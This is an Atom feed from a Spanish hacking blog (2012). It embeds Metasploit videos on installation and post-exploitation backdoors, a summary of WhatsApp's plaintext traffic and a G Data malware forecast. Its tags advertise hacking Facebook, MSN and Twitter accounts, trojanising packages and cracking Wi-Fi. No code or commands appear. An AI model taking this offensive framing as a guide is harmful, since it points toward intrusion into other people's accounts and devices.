<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;AkUNQno9eip7ImA9WhRUFkU.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461</id><updated>2012-01-27T12:18:13.462-06:00</updated><category term="exploradores" /><category term="backtrack5" /><category term="messenger como recuperar una cuenta de msn  messenger recuperar hotmail hackear hotmail" /><category term="exploits febrero 2011" /><category term="2wires" /><category term="ps" /><category term="remote system" /><category term="Exploit .LNK" /><category term="Hack windows 7 method css internet explorer 8" /><category term="webserver" /><category term="backtrack" /><category term="historia de los virus" /><category term="keylogger meterpreter" /><category term="hack facebook" /><category term="BackTrack 4 R2" /><category term="spam" /><category term="Armitage" /><category term="red zombie" /><category term="Gerix" /><category term="video" /><category term="hacking smb" /><category term="Installing Metasploit in iPad 2 IOS 5.0.1 Instalando Metasploit en iPad 2 IOS 5.0.1 metasploit en IOS" /><category term="peores contraseñas" /><category term="empleos hacking" /><category term="defendiendo la internet" /><category term="Penetration Testing in the Real World" /><category term="DNS Poisoning" /><category term="ARP spoofing" /><category term="permisos de ficheros" /><category term="WordPress Uploadify Plugin 1.0 Remote File Upload" /><category term="tron" /><category term="botnets" /><category term="exploit OpenSSL" /><category term="aircrack" /><category term="hack phpmyadmin" /><category term="messenger  hackear msn hack msn" /><category term="CSS" /><category term="sql injection facil" /><category term="wifi" /><category term="gnu/linux" /><category term="sniffing facebook" /><category term="sniffer WhatsApp" /><category term="nagios en debian lenny" /><category term="Hacking Windows 7 con Fasttrack" /><category term="hackear msn" /><category term="meterpreter commands" /><category term="metasploit" /><category term="admin 2wire" /><category term="exploit movie player" /><category term="2wire password" /><category term="messenger  hackear msn" /><category term="protector solar" /><category term="mac" /><category term="instalar backtrack3" /><category term="WhatsApp" /><category term="meterpreter scripts" /><category term="BackTrack 5" /><category term="backdoor con meterpreter" /><category term="Instalar emesene" /><category term="smb" /><category term="crackear claves wep" /><category term="pdf metasploit" /><category term="hacking" /><category term="ares galaxy en debian lenny" /><category term="ataque con armitage" /><category term="TELMEX" /><category term="Flu-Project" /><category term="hackear twitter" /><category term="Framework" /><category term="msfconsole" /><category term="facebook hack" /><category term="MAC troyanos" /><category term="msfconsole acrobat reader" /><category term="crackear WPA" /><category term="SET" /><category term="hacking tools" /><category term="troyanos" /><category term="Las Peores 500 Contraseñas de Todos los Tiempos" /><category term="hack" /><category term="acrobat reader maligno" /><category term="sqli helper" /><category term="netstat" /><category term="crackear claves WPA/WPA2" /><category term="messenger en linux" /><category term="hack backtrack" /><category term="Base de datos con Metasploit" /><category term="phpmyadmin" /><category term="sqli" /><category term="ssh" /><category term="comandos meterpreter" /><category term="Flu project" /><category term="hack privilegios en Windows vista/7/2008" /><category term="movie player" /><category term="pdf malicioso metasploit" /><category term="Hack Facebook: gerix wifi cracker" /><category term="pentesting" /><category term="Internet Explorer CSS 0day on Windows 7" /><category term="firewalls" /><category term="reverse port 80" /><category term="sniffers" /><category term="virus" /><category term="Reflexion" /><category term="psf malicioso" /><category term="metasploit y java" /><category term="claves OpenSSL" /><category term="boots" /><category term="DOS" /><category term="commandos meterpreter" /><category term="Cherokee webserver" /><category term="hack linux" /><category term="usar exploit" /><category term="metasploit hack acrobat reader" /><category term="pdf malicioso" /><category term="windows 7" /><category term="GnackTrack" /><category term="hack." /><category term="inseguridades" /><category term="-WIFI-Cracker-NG" /><category term="imagenes geeks" /><category term="25 años virus" /><category term="Microsoft: &quot;Chrome OS es un comentario en un blog&quot;" /><category term="javascript." /><category term="Troyanizando un paquete deb con Metasploit" /><category term="smdani" /><category term="RAT" /><category term="hack windows 7" /><category term="FreeBSD" /><category term="geek" /><category term="contraseñas vulnerables" /><category term="hostiles" /><category term="wpa" /><category term="hacker" /><category term="Problemas con Actualizar" /><category term="acrobat reader" /><category term="auditar wep" /><category term="escaneador de la red" /><category term="sql facil" /><category term="exploits" /><category term="navegar sin mi ip" /><category term="HTML" /><category term="WhatsApp hacking" /><category term="rap" /><category term="exploit" /><category term="applets hostiles" /><category term="hack windows" /><category term="meterpreter" /><category term="backtrack con gnome" /><category term="fasttrack" /><category term="hack BSD" /><category term="seguridad informatica empleos" /><category term="hacking windows7" /><category term="Internet Explorer CSS 0day" /><category term="zerialkiller" /><category term="hacking internet explorer" /><category term="recuperar facebook" /><category term="ipad" /><category term="hack 2wire" /><category term="script sql i" /><category term="no ip" /><category term="como recuperar una cuenta de facebook" /><category term="Crackea Redes WIFI" /><category term="sql injection" /><category term="Vulnerabilidad" /><category term="Cherokee market" /><category term="find" /><category term="ipw3945" /><category term="msn" /><category term="Tor" /><category term="hackear facebook" /><category term="acrobat metasploit" /><category term="hack VOIP" /><category term="ssh remote exploit" /><category term="sniff facebook" /><category term="linux" /><category term="Metasploit adobe" /><category term="USO Base de Datos Metasploit" /><category term="messenger" /><category term="scipts con meterpreter" /><category term="vulnerabilidades exploradores" /><category term="distros para auditorias VOIP" /><category term="internet explorer" /><category term="remote exploit" /><category term="nmap" /><category term="applets" /><category term="remote file" /><category term="como recuperar una cuenta de twitter" /><category term="hack wordpress" /><category term="hack WhatsApp" /><category term="crack facebok passwords" /><category term="noticias" /><category term="Musica" /><category term="wep" /><category term="Hack Windows7" /><category term="windows7" /><category term="recuperar twitter" /><category term="iptables" /><category term="exploit windows sp3 local esxploit remote exploit" /><category term="ares en linux" /><title>The zerial killer  Gnu/Linux</title><subtitle type="html">seguridad informatica, exploits, hacks, cracks, gnu/linux 
hacktivismo, metasploit, msfconsole, backtrack, linux, wifi, hack wifi, under...</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://zerialkiller.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>169</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/TheZerialKillerGnu/linux" /><feedburner:info uri="thezerialkillergnu/linux" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;AkUNQno8eSp7ImA9WhRUFkU.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-2140501636910344083</id><published>2012-01-27T12:13:00.002-06:00</published><updated>2012-01-27T12:18:13.471-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-27T12:18:13.471-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Installing Metasploit in iPad 2 IOS 5.0.1 Instalando Metasploit en iPad 2 IOS 5.0.1 metasploit en IOS" /><title>Instalar Metasploit en IOS 5</title><content type="html">Instalacion de Metasploit en IOS 5&lt;br /&gt;Installing Metasploit in iPad 2 IOS 5.0.1&lt;br /&gt;Instalando Metasploit en iPad 2 IOS 5.0.1&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://www.youtube.com/watch?v=lb5WRu3EjQI&amp;feature=youtu.be&lt;br /&gt;&lt;br /&gt;&lt;iframe width="420" height="315" src="http://www.youtube.com/embed/lb5WRu3EjQI" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-2140501636910344083?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/fHwqDLz9AfJsrmBwm4JpPX6Aw_I/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fHwqDLz9AfJsrmBwm4JpPX6Aw_I/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/fHwqDLz9AfJsrmBwm4JpPX6Aw_I/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/fHwqDLz9AfJsrmBwm4JpPX6Aw_I/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/b1DOAbNdMDo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/2140501636910344083/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=2140501636910344083" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2140501636910344083?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/2140501636910344083?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/b1DOAbNdMDo/instalar-metasploit-en-ios-5.html" title="Instalar Metasploit en IOS 5" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/lb5WRu3EjQI/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2012/01/instalar-metasploit-en-ios-5.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0YHSXk7fCp7ImA9WhRVE00.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-6154838882751423973</id><published>2012-01-11T10:57:00.000-06:00</published><updated>2012-01-11T10:58:58.704-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-11T10:58:58.704-06:00</app:edited><title>Securitytube Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)</title><content type="html">&lt;iframe src="http://player.vimeo.com/video/34399386?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="320" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/34399386"&gt;Part 10&lt;/a&gt; from &lt;a href="http://vimeo.com/user2264240"&gt;Vivek Ramachandran&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6154838882751423973?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/v1IzuOTuEjeUfZqRlAbxI-WR1Lw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/v1IzuOTuEjeUfZqRlAbxI-WR1Lw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/v1IzuOTuEjeUfZqRlAbxI-WR1Lw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/v1IzuOTuEjeUfZqRlAbxI-WR1Lw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/K72hujFtO-E" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/6154838882751423973/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=6154838882751423973" title="4 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/6154838882751423973?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/6154838882751423973?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/K72hujFtO-E/securitytube-metasploit-framework_11.html" title="Securitytube Metasploit Framework Expert Part 10 (Espia And Sniffer Extensions In Post Exploitation)" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>4</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2012/01/securitytube-metasploit-framework_11.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0cFSX8zeip7ImA9WhRVE00.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-6558627240292778539</id><published>2012-01-11T10:56:00.001-06:00</published><updated>2012-01-11T10:56:58.182-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-11T10:56:58.182-06:00</app:edited><title>Securitytube Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)</title><content type="html">&lt;iframe src="http://player.vimeo.com/video/34400978?title=0&amp;amp;byline=0&amp;amp;portrait=0" width="400" height="320" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen&gt;&lt;/iframe&gt;&lt;p&gt;&lt;a href="http://vimeo.com/34400978"&gt;Part 11&lt;/a&gt; from &lt;a href="http://vimeo.com/user2264240"&gt;Vivek Ramachandran&lt;/a&gt; on &lt;a href="http://vimeo.com"&gt;Vimeo&lt;/a&gt;.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-6558627240292778539?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/FTh9zSAnSSwK0ggS8jonNwtPhAE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FTh9zSAnSSwK0ggS8jonNwtPhAE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/FTh9zSAnSSwK0ggS8jonNwtPhAE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/FTh9zSAnSSwK0ggS8jonNwtPhAE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/u6t2rr_wbvk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/6558627240292778539/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=6558627240292778539" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/6558627240292778539?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/6558627240292778539?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/u6t2rr_wbvk/securitytube-metasploit-framework.html" title="Securitytube Metasploit Framework Expert Part 11 (Post Exploitation Backdoors)" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2012/01/securitytube-metasploit-framework.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0QCSX06fyp7ImA9WhRWF0U.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-5380249452434306666</id><published>2012-01-05T11:29:00.001-06:00</published><updated>2012-01-05T11:42:48.317-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-01-05T11:42:48.317-06:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="WhatsApp" /><category scheme="http://www.blogger.com/atom/ns#" term="WhatsApp hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="sniffer WhatsApp" /><category scheme="http://www.blogger.com/atom/ns#" term="hack WhatsApp" /><title>WhatsApp al descubierto</title><content type="html">Hoy vamos a hablar de una herramienta para sniffear todo lo que whatsapp manda/recibe en la red creada a partir del estudio realizado Alberto Ortega en su post 'WhatsApp y su seguridad, ¿pwn3d?'&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¿Qué es Whatsapp?&lt;br /&gt;&lt;br /&gt;Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos.&lt;br /&gt;&lt;br /&gt;¿Como funciona whatsapp?&lt;br /&gt;&lt;br /&gt;Como los chicos de securitybydefault nos comentaban en el otro post, whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano.&lt;br /&gt;&lt;br /&gt;Whatsapp usa el protocolo XMPP(una tecnología de comunicación en tiempo real muy potente y utilizada actualmente). Un claro ejemplo del uso de XMPP lo podemos encontrar en el tuenti chat sin ir muy lejos.&lt;br /&gt;Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;¿Un momento, seguro que van en texto plano?... Así cualquier desalmado puede leer mis mensajes cuando estoy en una red wifi..&lt;br /&gt;&lt;br /&gt;Exacto, todos los datos son enviados bajo texto plano, una vulnerabilidad que fue descubierta hace meses y reportada pero a la que whatsapp no hizo caso.&lt;br /&gt;&lt;br /&gt;Para leer el resto de la entrada visita el siguiente enlace.&lt;br /&gt;&lt;br /&gt;http://www.securitybydefault.com/2012/01/whatsapp-al-descubierto.html&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-5380249452434306666?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/b2UlJrRiurKYtEyaY2qmNeKLdz8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/b2UlJrRiurKYtEyaY2qmNeKLdz8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/b2UlJrRiurKYtEyaY2qmNeKLdz8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/b2UlJrRiurKYtEyaY2qmNeKLdz8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/TheZerialKillerGnu/linux/~4/cz99sPSAC2Q" height="1" width="1"/&gt;</content><link rel="related" href="http://www.securitybydefault.com/2012/01/whatsapp-al-descubierto.html" title="WhatsApp al descubierto" /><link rel="replies" type="application/atom+xml" href="http://zerialkiller.blogspot.com/feeds/5380249452434306666/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://www.blogger.com/comment.g?blogID=11983284204523461&amp;postID=5380249452434306666" title="6 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/5380249452434306666?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/11983284204523461/posts/default/5380249452434306666?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/TheZerialKillerGnu/linux/~3/cz99sPSAC2Q/whatsapp-al-descubierto.html" title="WhatsApp al descubierto" /><author><name>zerial killer</name><uri>http://www.blogger.com/profile/14344870841054401136</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://4.bp.blogspot.com/_OdUSaKBFEPk/TO7ih4vAvdI/AAAAAAAAAOU/Nva71EwqDpg/S220/hippixii.jpg" /></author><thr:total>6</thr:total><feedburner:origLink>http://zerialkiller.blogspot.com/2012/01/whatsapp-al-descubierto.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0IMQ3k7eyp7ImA9WhRXE0Q.&quot;"><id>tag:blogger.com,1999:blog-11983284204523461.post-8316634860277912401</id><published>2011-12-20T08:31:00.001-06:00</published><updated>2011-12-20T08:33:02.703-06:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-20T08:33:02.703-06:00</app:edited><title>Las amenazas que protagonizarán 2012</title><content type="html">&lt;a href="http://www.diarioti.com/sisimg/30936b_gdata-informe-460.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 460px; height: 354px;" src="http://www.diarioti.com/sisimg/30936b_gdata-informe-460.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Se mantendrá la tendencia y el malware crecerá de forma dramática el nuevo año. El lucro fácil, el ciberespionaje y el hacktivismo, principales “argumentos" de los ciberdelincuentes. &lt;br /&gt;&lt;br /&gt;Malware para tablets y smartphones, ataques “a medida" contra objetivos específicos, phising y troyanos bancarios constituyen las principales amenazas de la seguridad en 2012. La Eurocopa de Polonia y Ucrania, los Juegos Olímpicos de Londres y las elecciones presidenciales en Estados Unidos serán algunos de los hitos que los estafadores online intentarán utilizar para embaucar a sus víctimas. Por supuesto, sin olvidar el papel que pueden jugarán las redes sociales como difusoras de malware. Además el malware podría dar el salto a televisores y consolas con conexión a Internet&lt;br /&gt;&lt;br /&gt;Smartphones y tablets &lt;br /&gt;Los dispositivos con S.O. Android dominan el mercado de los smartphones y parece que cuentan con el beneplácito de la gran mayoría de los consumidores. Sin embargo, esta aceptación masiva por parte del usuario también está marcando el camino a seguir a los autores del malware. Durante 2012 se intensificarán los ataques contra esta plataforma con el objetivo de asegurar la mayor difusión posible a sus códigos maliciosos. &lt;br /&gt;&lt;br /&gt;Las aplicaciones (las populares “apps") constituyen la mejor forma de expandir el código malicioso, descargadas tanto del mercado oficial de Google como de otros mercados alternativos. Para infectar el terminal sólo se necesita que la víctima la descargue e instale en su terminal. Una vez dado este paso, el malware puede dañar el dispositivo de muchas formas: robar los datos personales almacenados y enviarlos a dispositivos remotos, interceptar conversaciones o suscribirlos a costosos servicios de mensajería Premium, por ejemplo.&lt;br /&gt;&lt;br /&gt;Ahora las aplicaciones maliciosas se instalan a través de los propios usuarios, después de que estos hayan sido engañados o convencidos mediante técnicas de ingeniería social. Sin embargo, los dispositivos móviles ofrecen muchas posibilidades técnicas y es solo cuestión de tiempo que nos enfrentemos a ataques automatizados donde las infecciones no dependan activamente del usuario. Desafortunadamente y teniendo en cuenta el ritmo de evolución del malware en esta plataforma, es fácil que en 2012 asistamos a estos primeros ataques automatizados, probablemente inspirados en los ataques drive-by que afectan a los ordenadores personales y que provocan la infección sin la participación de la víctima, después de visitar cualquier web adulterada. &lt;br /&gt;&lt;br /&gt;La velocidad a la que se desarrolla el nuevo malware contrasta con las pocas actualizaciones disponibles para Android. Ya se ha mencionado en numerosas ocasiones que Android podría convertirse en el nuevo Microsoft, en cuanto a diana de las nuevas amenazas, y parece que lleva camino de conseguirlo.&lt;br /&gt;&lt;br /&gt;Ataques dirigidos: Stuxnet y DuQu como precedentes &lt;br /&gt;El capítulo de los ataques dirigidos tendría que incluir a aquellos que utilizan los mencionados teléfonos inteligentes en un contexto profesional, pues resultan especialmente atractivos para los ciberdelincuentes en busca de información apetitosa y datos y aquí los tienen en cantidad y calidad. &lt;br /&gt;&lt;br /&gt;En cualquier caso, en 2011 vio la luz un particular spyware que causó un gran revuelo por estar específicamente diseñado para atacar a las empresas: DuQu. A pesar de que para muchos ha sido considerado como el sucesor de Stuxnet, esta herramienta de espionaje no está diseñada para el sabotaje tal cual lo entendemos. Sin embargo, DuQu es capaz de espiar a cualquier empresa, por lo que funciona más como un ladrón de datos que como una herramienta cuyo fin sea destruir un objetivo concreto. Su propósito sería recopilar tanta información como fuera posible para un posterior ataque como el protagonizado por Stuxnet. &lt;br /&gt;&lt;br /&gt;Sin embargo, resulta alarmante comprobar que hay indicios en su código fuente que sugieren que pudo ser escrito por los creadores de Stuxnet. Las motivaciones políticas y las reivindicaciones de cualquier tipo (y ya no sólo el interés lucrativo) han entrado en escena cuando hablamos de ciberseguridad. Y el hecho de que los atacantes puedan conseguir el control de infraestructuras críticas ha dejado de ser una ficción como quedó de manifiesto con el ataque de Stuxnet en la planta nuclear iraní de Buschehr.&lt;br /&gt;&lt;br /&gt;Los hitos del nuevo año &lt;br /&gt;2012 se inicia con importantes eventos en el horizonte (entre otros, la Eurocopa de Fútbol en Polonia y Ucrania, los Juegos Olímpicos de Londres o las elecciones presidenciales en Estados Unidos) y estos sin duda darán contenido a muchos de los intentos de estafa que se producirán el próximo año: &lt;br /&gt;&lt;br /&gt;Las amenazas digitales a las que se enfrentan los eventos deportivos mencionados podrán incluir:&lt;br /&gt;&lt;br /&gt;-Oleadas de spam y manipulación de motores de búsqueda online para la venta de entradas y todo tipo de elementos falsificados relacionados con los eventos señalados&lt;br /&gt;&lt;br /&gt;-Diseño de páginas falsas de venta online de entradas a los diferentes eventos deportivos &lt;br /&gt;&lt;br /&gt;-Ataques contra los sitios oficiales de los Juegos Olímpicos y/o Eurocopa como potenciales formas de protesta&lt;br /&gt;&lt;br /&gt;-Ataques contra las redes inalámbricas WLAN diseñadas para los visitantes que acudan a estos eventos&lt;br /&gt;&lt;br /&gt;La lista de ataques potenciales puede ser más larga pues no hay que olvidar los ataques contra infraestructura, bien como intento de sabotaje o como elemento de chantaje.&lt;br /&gt;&lt;br /&gt;En el caso de las elecciones presidenciales de los Estados Unidos los atacantes pueden recurrir a la ingeniería social con promesas de videos escandalosos o fotografías que afecten a los candidatos para conducir a los internautas a sitios web infectados con código malicioso. Se trata de trucos tan habituales como puedan ser las oleadas de spam cuyo contenido tenga alguna conexión con el asunto electoral y sirva para conducir a sus víctimas potenciales a todo tipo de páginas capaces de provocar una infección en el PC de sus víctimas.&lt;br /&gt;&lt;br /&gt;Phishing y troyanos bancarios &lt;br /&gt;Si hablamos de phishing, los usuarios podrían tener que enfrentarse con oleadas de ataques altamente sofisticados y a menudo con un target específico. No podemos olvidar el ataque sufrido por la red de Sony PlayStation en el que se comprometieron los datos de cerca de 77 millones de clientes. La información robada entonces podría ser usada ahora en correos electrónicos que tuvieran como fin estafar a sus destinatarios.&lt;br /&gt;&lt;br /&gt;Aunque hemos visto que no solo existen motivaciones económicas, el dinero fácil seguirá siendo el principal argumento de las actividades ilícitas delos ciberdelincuentes y una de las formas más populares de conseguirlo durante este 2011 fueron los troyanos bancarios. Todo indica que en 2012 nada hará cambiar esta tendencia, si no, más bien todo lo contrario si atendemos al número creciente de usuarios de banca online (en España, el 46,5% de los internautas#). Los troyanos bancarios constituyen pues una amenaza que debe ser tomada muy en serio, especialmente por los usuarios particulares, ya que un ataque exitoso a menudo supone una pérdida financiera significativa para la víctima.&lt;br /&gt;&lt;br /&gt;SmartTVs y consolas &lt;br /&gt;Al margen de ordenadores y smartphones, que constituyen las grandes plataformas de conexión a Internet, otros equipos empiezan a conectarse ya de forma habitual desde el salón de cualquier hogar. Nos referimos a televisores y consolas que en principio estaban fuera del campo de acción de los cibercliminales pero que a medida que se convierten en dispositivos conectados pueden empezar a estar en peligro, sobre todo si tenemos en cuenta que por regla general están desprotegidos y carecen de actualizaciones frecuentes.&lt;br /&gt;&lt;br /&gt;“2012 estará protagonizado por ataques dirigidos contra todo tipo de organizaciones, con independencia de su tamaño. Las empresas pequeñas a menudo no están conveniente protegidas lo que las convierte en objetivos más sencillos y vulnerables. Los grandes eventos como los juegos Olímpicos o las elecciones presidenciales darán contenido a muchas de la amenazas. Los smartphones con sistema operativo Android se convertirán en centro de muchos ataques a medida. Y si en 2011 el número de amenazas creció de forma dramática, la tendencia se mantendrá en 2012. El malware se consolidará como la mejor arma de los cibercriminales para conseguir dinero, pero también como herramienta de ciberespionaje y hacktivismo" &lt;br /&gt;&lt;br /&gt;Fuente: G Data Software AG &lt;br /&gt;Ilustración: G Data&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11983284204523461-8316634860277912401?l=zerialkiller.blogspot.com' alt='' /&gt;&lt;/div&gt;
